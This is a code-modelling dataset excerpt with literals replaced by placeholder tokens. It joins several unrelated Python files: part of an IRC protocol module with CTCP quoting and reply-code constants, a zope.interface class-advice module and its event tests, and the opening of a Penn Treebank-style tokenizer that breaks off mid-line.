<NUM_LIT:0> ] <EOL> if len ( m ) > <NUM_LIT:1> : <EOL> data = m [ <NUM_LIT:1> ] <EOL> else : <EOL> data = None <EOL> extended_messages [ i ] = ( tag , data ) <EOL> return retval <EOL> M_QUOTE = chr ( <NUM_LIT:0> <NUM_LIT:20> ) <EOL> mQuoteTable = { <EOL> NUL : M_QUOTE + '<STR_LIT:0>' , <EOL> NL : M_QUOTE + '<STR_LIT:n>' , <EOL> CR : M_QUOTE + '<STR_LIT:r>' , <EOL> M_QUOTE : M_QUOTE + M_QUOTE <EOL> } <EOL> mDequoteTable = { } <EOL> for k , v in mQuoteTable . items ( ) : <EOL> mDequoteTable [ v [ - <NUM_LIT:1> ] ] = k <EOL> del k , v <EOL> mEscape_re = re . compile ( '<STR_LIT>' % ( re . escape ( M_QUOTE ) , ) , re . DOTALL ) <EOL> def lowQuote ( s ) : <EOL> for c in ( M_QUOTE , NUL , NL , CR ) : <EOL> s = string . replace ( s , c , mQuoteTable [ c ] ) <EOL> return s <EOL> def lowDequote ( s ) : <EOL> def sub ( matchobj , mDequoteTable = mDequoteTable ) : <EOL> s = matchobj . group ( ) [ <NUM_LIT:1> ] <EOL> try : <EOL> s = mDequoteTable [ s ] <EOL> except KeyError : <EOL> s = s <EOL> return s <EOL> return mEscape_re . sub ( sub , s ) <EOL> X_QUOTE = '<STR_LIT:\\>' <EOL> xQuoteTable = { <EOL> X_DELIM : X_QUOTE + '<STR_LIT:a>' , <EOL> X_QUOTE : X_QUOTE + X_QUOTE <EOL> } <EOL> xDequoteTable = { } <EOL> for k , v in xQuoteTable . items ( ) : <EOL> xDequoteTable [ v [ - <NUM_LIT:1> ] ] = k <EOL> xEscape_re = re . compile ( '<STR_LIT>' % ( re . escape ( X_QUOTE ) , ) , re . DOTALL ) <EOL> def ctcpQuote ( s ) : <EOL> for c in ( X_QUOTE , X_DELIM ) : <EOL> s = string . replace ( s , c , xQuoteTable [ c ] ) <EOL> return s <EOL> def ctcpDequote ( s ) : <EOL> def sub ( matchobj , xDequoteTable = xDequoteTable ) : <EOL> s = matchobj . group ( ) [ <NUM_LIT:1> ] <EOL> try : <EOL> s = xDequoteTable [ s ] <EOL> except KeyError : <EOL> s = s <EOL> return s <EOL> return xEscape_re . sub ( sub , s ) <EOL> def ctcpStringify ( messages ) : <EOL> """<STR_LIT>""" <EOL> coded_messages = [ ] <EOL> for ( tag , data ) in messages : <EOL> if data : <EOL> if not isinstance ( data , types . StringType ) : <EOL> try : <EOL> data = "<STR_LIT:U+0020>" . join ( map ( str , data ) ) <EOL> except TypeError : <EOL> pass <EOL> m = "<STR_LIT>" % ( tag , data ) <EOL> else : <EOL> m = str ( tag ) <EOL> m = ctcpQuote ( m ) <EOL> m = "<STR_LIT>" % ( X_DELIM , m , X_DELIM ) <EOL> coded_messages . append ( m ) <EOL> line = string . join ( coded_messages , '<STR_LIT>' ) <EOL> return line <EOL> RPL_WELCOME = '<STR_LIT>' <EOL> RPL_YOURHOST = '<STR_LIT>' <EOL> RPL_CREATED = '<STR_LIT>' <EOL> RPL_MYINFO = '<STR_LIT>' <EOL> RPL_ISUPPORT = '<STR_LIT>' <EOL> RPL_BOUNCE = '<STR_LIT>' <EOL> RPL_USERHOST = '<STR_LIT>' <EOL> RPL_ISON = '<STR_LIT>' <EOL> RPL_AWAY = '<STR_LIT>' <EOL> RPL_UNAWAY = '<STR_LIT>' <EOL> RPL_NOWAWAY = '<STR_LIT>' <EOL> RPL_WHOISUSER = '<STR_LIT>' <EOL> RPL_WHOISSERVER = '<STR_LIT>' <EOL> RPL_WHOISOPERATOR = '<STR_LIT>' <EOL> RPL_WHOISIDLE = '<STR_LIT>' <EOL> RPL_ENDOFWHOIS = '<STR_LIT>' <EOL> RPL_WHOISCHANNELS = '<STR_LIT>' <EOL> RPL_WHOWASUSER = '<STR_LIT>' <EOL> RPL_ENDOFWHOWAS = '<STR_LIT>' <EOL> RPL_LISTSTART = '<STR_LIT>' <EOL> RPL_LIST = '<STR_LIT>' <EOL> RPL_LISTEND = '<STR_LIT>' <EOL> RPL_UNIQOPIS = '<STR_LIT>' <EOL> RPL_CHANNELMODEIS = '<STR_LIT>' <EOL> RPL_NOTOPIC = '<STR_LIT>' <EOL> RPL_TOPIC = '<STR_LIT>' <EOL> RPL_INVITING = '<STR_LIT>' <EOL> RPL_SUMMONING = '<STR_LIT>' <EOL> RPL_INVITELIST = '<STR_LIT>' <EOL> RPL_ENDOFINVITELIST = '<STR_LIT>' <EOL> RPL_EXCEPTLIST = '<STR_LIT>' <EOL> RPL_ENDOFEXCEPTLIST = '<STR_LIT>' <EOL> RPL_VERSION = '<STR_LIT>' <EOL> RPL_WHOREPLY = '<STR_LIT>' <EOL> RPL_ENDOFWHO = '<STR_LIT>' <EOL> RPL_NAMREPLY = '<STR_LIT>' <EOL> RPL_ENDOFNAMES = '<STR_LIT>' <EOL> RPL_LINKS = '<STR_LIT>' <EOL> RPL_ENDOFLINKS = '<STR_LIT>' <EOL> RPL_BANLIST = '<STR_LIT>' <EOL> RPL_ENDOFBANLIST = '<STR_LIT>' <EOL> RPL_INFO = '<STR_LIT>' <EOL> RPL_ENDOFINFO = '<STR_LIT>' <EOL> RPL_MOTDSTART = '<STR_LIT>' <EOL> RPL_MOTD = '<STR_LIT>' <EOL> RPL_ENDOFMOTD = '<STR_LIT>' <EOL> RPL_YOUREOPER = '<STR_LIT>' <EOL> RPL_REHASHING = '<STR_LIT>' <EOL> RPL_YOURESERVICE = '<STR_LIT>' <EOL> RPL_TIME = '<STR_LIT>' <EOL> RPL_USERSSTART = '<STR_LIT>' <EOL> RPL_USERS = '<STR_LIT>' <EOL> RPL_ENDOFUSERS = '<STR_LIT>' <EOL> RPL_NOUSERS = '<STR_LIT>' <EOL> RPL_TRACELINK = '<STR_LIT>' <EOL> RPL_TRACECONNECTING = '<STR_LIT>' <EOL> RPL_TRACEHANDSHAKE = '<STR_LIT>' <EOL> RPL_TRACEUNKNOWN = '<STR_LIT>' <EOL> RPL_TRACEOPERATOR = '<STR_LIT>' <EOL> RPL_TRACEUSER = '<STR_LIT>' <EOL> RPL_TRACESERVER = '<STR_LIT>' <EOL> RPL_TRACESERVICE = '<STR_LIT>' <EOL> RPL_TRACENEWTYPE = '<STR_LIT>' <EOL> RPL_TRACECLASS = '<STR_LIT>' <EOL> RPL_TRACERECONNECT = '<STR_LIT>' <EOL> RPL_TRACELOG = '<STR_LIT>' <EOL> RPL_TRACEEND = '<STR_LIT>' <EOL> RPL_STATSLINKINFO = '<STR_LIT>' <EOL> RPL_STATSCOMMANDS = '<STR_LIT>' <EOL> RPL_ENDOFSTATS = '<STR_LIT>' <EOL> RPL_STATSUPTIME = '<STR_LIT>' <EOL> RPL_STATSOLINE = '<STR_LIT>' <EOL> RPL_UMODEIS = '<STR_LIT>' <EOL> RPL_SERVLIST = '<STR_LIT>' <EOL> RPL_SERVLISTEND = '<STR_LIT>' <EOL> RPL_LUSERCLIENT = '<STR_LIT>' <EOL> RPL_LUSEROP = '<STR_LIT>' <EOL> RPL_LUSERUNKNOWN = '<STR_LIT>' <EOL> RPL_LUSERCHANNELS = '<STR_LIT>' <EOL> RPL_LUSERME = '<STR_LIT>' <EOL> RPL_ADMINME = '<STR_LIT>' <EOL> RPL_ADMINLOC = '<STR_LIT>' <EOL> RPL_ADMINLOC = '<STR_LIT>' <EOL> RPL_ADMINEMAIL = '<STR_LIT>' <EOL> RPL_TRYAGAIN = '<STR_LIT>' <EOL> ERR_NOSUCHNICK = '<STR_LIT>' <EOL> ERR_NOSUCHSERVER = '<STR_LIT>' <EOL> ERR_NOSUCHCHANNEL = '<STR_LIT>' <EOL> ERR_CANNOTSENDTOCHAN = '<STR_LIT>' <EOL> ERR_TOOMANYCHANNELS = '<STR_LIT>' <EOL> ERR_WASNOSUCHNICK = '<STR_LIT>' <EOL> ERR_TOOMANYTARGETS = '<STR_LIT>' <EOL> ERR_NOSUCHSERVICE = '<STR_LIT>' <EOL> ERR_NOORIGIN = '<STR_LIT>' <EOL> ERR_NORECIPIENT = '<STR_LIT>' <EOL> ERR_NOTEXTTOSEND = '<STR_LIT>' <EOL> ERR_NOTOPLEVEL = '<STR_LIT>' <EOL> ERR_WILDTOPLEVEL = '<STR_LIT>' <EOL> ERR_BADMASK = '<STR_LIT>' <EOL> ERR_UNKNOWNCOMMAND = '<STR_LIT>' <EOL> ERR_NOMOTD = '<STR_LIT>' <EOL> ERR_NOADMININFO = '<STR_LIT>' <EOL> ERR_FILEERROR = '<STR_LIT>' <EOL> ERR_NONICKNAMEGIVEN = '<STR_LIT>' <EOL> ERR_ERRONEUSNICKNAME = '<STR_LIT>' <EOL> ERR_NICKNAMEINUSE = '<STR_LIT>' <EOL> ERR_NICKCOLLISION = '<STR_LIT>' <EOL> ERR_UNAVAILRESOURCE = '<STR_LIT>' <EOL> ERR_USERNOTINCHANNEL = '<STR_LIT>' <EOL> ERR_NOTONCHANNEL = '<STR_LIT>' <EOL> ERR_USERONCHANNEL = '<STR_LIT>' <EOL> ERR_NOLOGIN = '<STR_LIT>' <EOL> ERR_SUMMONDISABLED = '<STR_LIT>' <EOL> ERR_USERSDISABLED = '<STR_LIT>' <EOL> ERR_NOTREGISTERED = '<STR_LIT>' <EOL> ERR_NEEDMOREPARAMS = '<STR_LIT>' <EOL> ERR_ALREADYREGISTRED = '<STR_LIT>' <EOL> ERR_NOPERMFORHOST = '<STR_LIT>' <EOL> ERR_PASSWDMISMATCH = '<STR_LIT>' <EOL> ERR_YOUREBANNEDCREEP = '<STR_LIT>' <EOL> ERR_YOUWILLBEBANNED = '<STR_LIT>' <EOL> ERR_KEYSET = '<STR_LIT>' <EOL> ERR_CHANNELISFULL = '<STR_LIT>' <EOL> ERR_UNKNOWNMODE = '<STR_LIT>' <EOL> ERR_INVITEONLYCHAN = '<STR_LIT>' <EOL> ERR_BANNEDFROMCHAN = '<STR_LIT>' <EOL> ERR_BADCHANNELKEY = '<STR_LIT>' <EOL> ERR_BADCHANMASK = '<STR_LIT>' <EOL> ERR_NOCHANMODES = '<STR_LIT>' <EOL> ERR_BANLISTFULL = '<STR_LIT>' <EOL> ERR_NOPRIVILEGES = '<STR_LIT>' <EOL> ERR_CHANOPRIVSNEEDED = '<STR_LIT>' <EOL> ERR_CANTKILLSERVER = '<STR_LIT>' <EOL> ERR_RESTRICTED = '<STR_LIT>' <EOL> ERR_UNIQOPPRIVSNEEDED = '<STR_LIT>' <EOL> ERR_NOOPERHOST = '<STR_LIT>' <EOL> ERR_NOSERVICEHOST = '<STR_LIT>' <EOL> ERR_UMODEUNKNOWNFLAG = '<STR_LIT>' <EOL> ERR_USERSDONTMATCH = '<STR_LIT>' <EOL> symbolic_to_numeric = { <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> } <EOL> numeric_to_symbolic = { } <EOL> for k , v in symbolic_to_numeric . items ( ) : <EOL> numeric_to_symbolic [ v ] = k </s>
<s> """<STR_LIT>""" <EOL> from types import FunctionType <EOL> try : <EOL> from types import ClassType <EOL> except ImportError : <EOL> __python3 = True <EOL> else : <EOL> __python3 = False <EOL> import sys <EOL> def getFrameInfo ( frame ) : <EOL> """<STR_LIT>""" <EOL> f_locals = frame . f_locals <EOL> f_globals = frame . f_globals <EOL> sameNamespace = f_locals is f_globals <EOL> hasModule = '<STR_LIT>' in f_locals <EOL> hasName = '<STR_LIT>' in f_globals <EOL> sameName = hasModule and hasName <EOL> sameName = sameName and f_globals [ '<STR_LIT>' ] == f_locals [ '<STR_LIT>' ] <EOL> module = hasName and sys . modules . get ( f_globals [ '<STR_LIT>' ] ) or None <EOL> namespaceIsModule = module and module . __dict__ is f_globals <EOL> if not namespaceIsModule : <EOL> kind = "<STR_LIT>" <EOL> elif sameNamespace and not hasModule : <EOL> kind = "<STR_LIT>" <EOL> elif sameName and not sameNamespace : <EOL> kind = "<STR_LIT:class>" <EOL> elif not sameNamespace : <EOL> kind = "<STR_LIT>" <EOL> else : <EOL> kind = "<STR_LIT>" <EOL> return kind , module , f_locals , f_globals <EOL> def addClassAdvisor ( callback , depth = <NUM_LIT:2> ) : <EOL> """<STR_LIT>""" <EOL> if __python3 : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> frame = sys . _getframe ( depth ) <EOL> kind , module , caller_locals , caller_globals = getFrameInfo ( frame ) <EOL> previousMetaclass = caller_locals . get ( '<STR_LIT>' ) <EOL> if __python3 : <EOL> defaultMetaclass = caller_globals . get ( '<STR_LIT>' , type ) <EOL> else : <EOL> defaultMetaclass = caller_globals . get ( '<STR_LIT>' , ClassType ) <EOL> def advise ( name , bases , cdict ) : <EOL> if '<STR_LIT>' in cdict : <EOL> del cdict [ '<STR_LIT>' ] <EOL> if previousMetaclass is None : <EOL> if bases : <EOL> meta = determineMetaclass ( bases ) <EOL> else : <EOL> meta = defaultMetaclass <EOL> elif isClassAdvisor ( previousMetaclass ) : <EOL> meta = previousMetaclass <EOL> else : <EOL> meta = determineMetaclass ( bases , previousMetaclass ) <EOL> newClass = meta ( name , bases , cdict ) <EOL> return callback ( newClass ) <EOL> advise . previousMetaclass = previousMetaclass <EOL> advise . callback = callback <EOL> caller_locals [ '<STR_LIT>' ] = advise <EOL> def isClassAdvisor ( ob ) : <EOL> """<STR_LIT>""" <EOL> return isinstance ( ob , FunctionType ) and hasattr ( ob , '<STR_LIT>' ) <EOL> def determineMetaclass ( bases , explicit_mc = None ) : <EOL> """<STR_LIT>""" <EOL> meta = [ getattr ( b , '<STR_LIT>' , type ( b ) ) for b in bases ] <EOL> if explicit_mc is not None : <EOL> meta . append ( explicit_mc ) <EOL> if len ( meta ) == <NUM_LIT:1> : <EOL> return meta [ <NUM_LIT:0> ] <EOL> candidates = minimalBases ( meta ) <EOL> if not candidates : <EOL> assert ( not __python3 ) <EOL> return ClassType <EOL> elif len ( candidates ) > <NUM_LIT:1> : <EOL> raise TypeError ( "<STR_LIT>" , bases ) <EOL> return candidates [ <NUM_LIT:0> ] <EOL> def minimalBases ( classes ) : <EOL> """<STR_LIT>""" <EOL> if not __python3 : <EOL> classes = [ c for c in classes if c is not ClassType ] <EOL> candidates = [ ] <EOL> for m in classes : <EOL> for n in classes : <EOL> if issubclass ( n , m ) and m is not n : <EOL> break <EOL> else : <EOL> if m in candidates : <EOL> candidates . remove ( m ) <EOL> candidates . append ( m ) <EOL> return candidates </s>
<s> import unittest <EOL> class _SilencePy3Deprecations ( unittest . TestCase ) : <EOL> def failUnless ( self , expr ) : <EOL> return self . assertTrue ( expr ) <EOL> def failIf ( self , expr ) : <EOL> return self . assertFalse ( expr ) <EOL> class _ConformsToIObjectEvent ( object ) : <EOL> def _makeOne ( self , target = None ) : <EOL> if target is None : <EOL> target = object ( ) <EOL> return self . _getTargetClass ( ) ( target ) <EOL> def test_class_conforms_to_IObjectEvent ( self ) : <EOL> from zope . interface . interfaces import IObjectEvent <EOL> from zope . interface . verify import verifyClass <EOL> verifyClass ( IObjectEvent , self . _getTargetClass ( ) ) <EOL> def test_instance_conforms_to_IObjectEvent ( self ) : <EOL> from zope . interface . interfaces import IObjectEvent <EOL> from zope . interface . verify import verifyObject <EOL> verifyObject ( IObjectEvent , self . _makeOne ( ) ) <EOL> class _ConformsToIRegistrationEvent ( _ConformsToIObjectEvent ) : <EOL> def test_class_conforms_to_IRegistrationEvent ( self ) : <EOL> from zope . interface . interfaces import IRegistrationEvent <EOL> from zope . interface . verify import verifyClass <EOL> verifyClass ( IRegistrationEvent , self . _getTargetClass ( ) ) <EOL> def test_instance_conforms_to_IRegistrationEvent ( self ) : <EOL> from zope . interface . interfaces import IRegistrationEvent <EOL> from zope . interface . verify import verifyObject <EOL> verifyObject ( IRegistrationEvent , self . _makeOne ( ) ) <EOL> class ObjectEventTests ( _SilencePy3Deprecations , _ConformsToIObjectEvent ) : <EOL> def _getTargetClass ( self ) : <EOL> from zope . interface . interfaces import ObjectEvent <EOL> return ObjectEvent <EOL> def test_ctor ( self ) : <EOL> target = object ( ) <EOL> event = self . _makeOne ( target ) <EOL> self . failUnless ( event . object is target ) <EOL> class RegistrationEventTests ( _SilencePy3Deprecations , <EOL> _ConformsToIRegistrationEvent ) : <EOL> def _getTargetClass ( self ) : <EOL> from zope . interface . interfaces import RegistrationEvent <EOL> return RegistrationEvent <EOL> def test___repr__ ( self ) : <EOL> target = object ( ) <EOL> event = self . _makeOne ( target ) <EOL> r = repr ( event ) <EOL> self . assertEqual ( r . splitlines ( ) , <EOL> [ '<STR_LIT>' , repr ( target ) ] ) <EOL> class RegisteredTests ( _SilencePy3Deprecations , <EOL> _ConformsToIRegistrationEvent ) : <EOL> def _getTargetClass ( self ) : <EOL> from zope . interface . interfaces import Registered <EOL> return Registered <EOL> def test_class_conforms_to_IRegistered ( self ) : <EOL> from zope . interface . interfaces import IRegistered <EOL> from zope . interface . verify import verifyClass <EOL> verifyClass ( IRegistered , self . _getTargetClass ( ) ) <EOL> def test_instance_conforms_to_IRegistered ( self ) : <EOL> from zope . interface . interfaces import IRegistered <EOL> from zope . interface . verify import verifyObject <EOL> verifyObject ( IRegistered , self . _makeOne ( ) ) <EOL> class UnregisteredTests ( _SilencePy3Deprecations , <EOL> _ConformsToIRegistrationEvent ) : <EOL> def _getTargetClass ( self ) : <EOL> from zope . interface . interfaces import Unregistered <EOL> return Unregistered <EOL> def test_class_conforms_to_IUnregistered ( self ) : <EOL> from zope . interface . interfaces import IUnregistered <EOL> from zope . interface . verify import verifyClass <EOL> verifyClass ( IUnregistered , self . _getTargetClass ( ) ) <EOL> def test_instance_conforms_to_IUnregistered ( self ) : <EOL> from zope . interface . interfaces import IUnregistered <EOL> from zope . interface . verify import verifyObject <EOL> verifyObject ( IUnregistered , self . _makeOne ( ) ) <EOL> def test_suite ( ) : <EOL> return unittest . TestSuite ( ( <EOL> unittest . makeSuite ( ObjectEventTests ) , <EOL> unittest . makeSuite ( RegistrationEventTests ) , <EOL> unittest . makeSuite ( RegisteredTests ) , <EOL> unittest . makeSuite ( UnregisteredTests ) , <EOL> ) ) </s>
<s> from __future__ import with_statement <EOL> import re <EOL> INPUT_ENCODING = "<STR_LIT>" <EOL> OUTPUT_ENCODING = "<STR_LIT>" <EOL> DEBUG_GTB_TOKENIZATION = False <EOL> PTB_ESCAPES = [ ( '<STR_LIT:(>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:)>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:[>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:]>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:{>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:}>' , '<STR_LIT>' ) , <EOL> ] <EOL> def PTB_escape ( s ) : <EOL> for u , e in PTB_ESCAPES : <EOL> s = s . replace ( u , e ) <EOL> return s <EOL> def PTB_unescape ( s ) : <EOL> for u , e in PTB_ESCAPES : <EOL> s = s . replace ( e , u ) <EOL> return s <EOL> __initial , __repeated , __final = [ ] , [ ] , [ ] <EOL> __initial . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __initial . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __initial . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __initial . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __initial . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __initial . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __initial . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __initial . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __initial . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __initial . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __initial . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __initial . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __initial . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __initial . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __repeated . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __repeated . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __repeated . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __repeated . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __repeated . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __repeated . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , r'<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( r'<STR_LIT>' ) , '<STR_LIT>' ) ) <EOL> __final . append ( ( re . compile ( 